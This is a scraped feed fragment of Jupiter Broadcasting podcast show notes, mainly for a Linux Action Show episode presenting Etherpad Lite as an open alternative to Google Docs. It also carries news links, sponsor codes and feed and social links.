Follow the show

• Email the show
• Live Monday 9am PST
• Music by: Ronald Jenkees
• Mike on Twitter
• Mike on Google+
• Mike’s website
• Chris on twitter
• Chris on Google+

The post Captain’s Log | CR 39 first appeared on Jupiter Broadcasting.

]]> https://original.jupiterbroadcasting.net/31201/google-docs-alternative-las-s25e06/ Sun, 03 Feb 2013 13:25:11 +0000 https://original.jupiterbroadcasting.net/?p=31201 Google Docs has some powerful features, collaborative editing being chief among them. We’ll show you why Etherpad Lite is more than just multiplayer notepad.

The post Google Docs Alternative | LAS | s25e06 first appeared on Jupiter Broadcasting.

]]>



Google Docs has some powerful features, collaborative editing being chief among them. This week we’ll show you why Etherpad Lite is more than just multiplayer notepad.

Plus why Valve’s Gabe Newell thinks Apple might be a big threat, the major new feature landing in Ubuntu 13.04, and the tasty gift Google gave to some UK schools!

AND SO MUCH MORE!

All this week on, The Linux Action Show!

Thanks to:

GoDaddy.com

Use our code linux295 to get a .COM for $2.95.

47% off your ENTIRE order just use our code go47off2 until the 8th!.

Download:

HD Video | Mobile Video | Ogg Video | MP3 Audio | Ogg Audio | YouTube | HD Torrent

RSS Feeds:

HD Video Feed | Large Video Feed | Mobile Video Feed | MP3 Feed | Ogg Feed | iTunes Feeds | Torrent Feed

Support the Show:

Purchase anything at Amazon.com Purchase anything at Think Geek using this link Purchase anything at Newegg using this link Contribute directly on our donation page or check out our advertising options and reach millions of amazing people! Grab our Chrome Extension and auto-tag your shopping session for us!

— Show Notes: —

The Open Google Docs Replacement:




Brought to you by: System76

Up front: This is really focused on Google Docs’ collaborative features. As I have found these to be particularly a powerful competitive advantage of Google Docs. If you haven’t tried it, try it during your next meeting, or brainstorming session, or maybe just grocery shop list making from separate rooms. TRY IT!

First launched in November 2008, the software was acquired by Google in December 2009 and released as open source later that month. Several services now use the Etherpad software, including PiratePad, Telecomix Pad, Framapad, Mozilla Pad (MoPad), PrimaryPad, TypeWith.me, Sync.in, TitanPad and iEtherPad.com. Further development is coordinated by the Etherpad Foundation.

Etherpad Lite is an almost complete rewrite of the original Etherpad software, based on different technical foundations and written by different authors. While the original Etherpad is written in Scala and has quite big system requirements, Etherpad Lite is written in server-side JavaScript using node.js. The original realtime synchronization library (called Easysync) remains the same.

Apache License version 2.0 on December 17, 2009.

• Etherpad lite
• MoPad – We do a live demo with the chat room
• Jane’s Extracts: EtherPad
• node.js – How to keep up with the latest versions of NodeJS in Ubuntu

Prerequisites:

• NodeJS
• npm
• Uncomment and change admin pw in settings.json

---

– Picks –

Runs Linux:

• Australia’s Defence, Runs Linux

Android Pick:

• Last Message – Thanks T8ert0t!
• Android Picks so far thanks to Madjo in the IRC Chat room!

Desktop App Pick:

• Fotoxx 3.02t

• Picks so far

• Madjo

Search our past picks:

• Linux Action Show Lookup
• Thanks to sakuramboo!

Git yours hands all over our STUFF:

• Jupiter Broadcasting Affiliate Extensions
• Callisto-app – Google Project Hosting
• Quick Update to the Jupiter Broadcasting Android App

---

— NEWS —




Brought to you by: Loot Crate, use code Linux to save!

• Gabe Newell: Steam Box’s biggest threat isn’t consoles, it’s Apple

• How to destroy a brand-new Samsung laptop: Boot Linux on it

• Protection against Samsung UEFI bug merged into Linux kernel

• Ubuntu Smart Scopes

• SmartScopes1304Spec – Ubuntu Wiki

• 15,000 Raspberry Pis for UK schools – thanks Google!

• XBMC 12 Frodo media center now available for Windows, Mac, Linux, Android, more

— FEEDBACK —

• Something to consider when buying from Steam…

• LFNW: It’s about the community!

• LOL: Linux Outlaws Live

• SCALE 11x

• Steam games covered last week not listed?

Next Week: Podcasting and Skype Recording under Linux!

— Chris’ Stash —

• T-Shirt without or without Swearing?

— What’s Matt Doin? —

• Pros and Cons of a Ubuntu Rolling Release
• Writing about Linux, sometimes, even asking tough questions
• Offering newbie centric advice, in my articles

— Find us on Google+ —

• Chris
• Matt Hartley
• Jupiter Broadcasting’s Page

— Find us on Twitter —

• Chris – ChrisLAS
• Matt – matthartley

— Follow the network on Facebook: —

• Jupiter Broadcasting on Facebook

— Catch the show LIVE Sunday 10am Pacific / 1pm Eastern / 6pm UTC: —

• https://jblive.tv
• Network Calendar

The post Google Docs Alternative | LAS | s25e06 first appeared on Jupiter Broadcasting.

]]>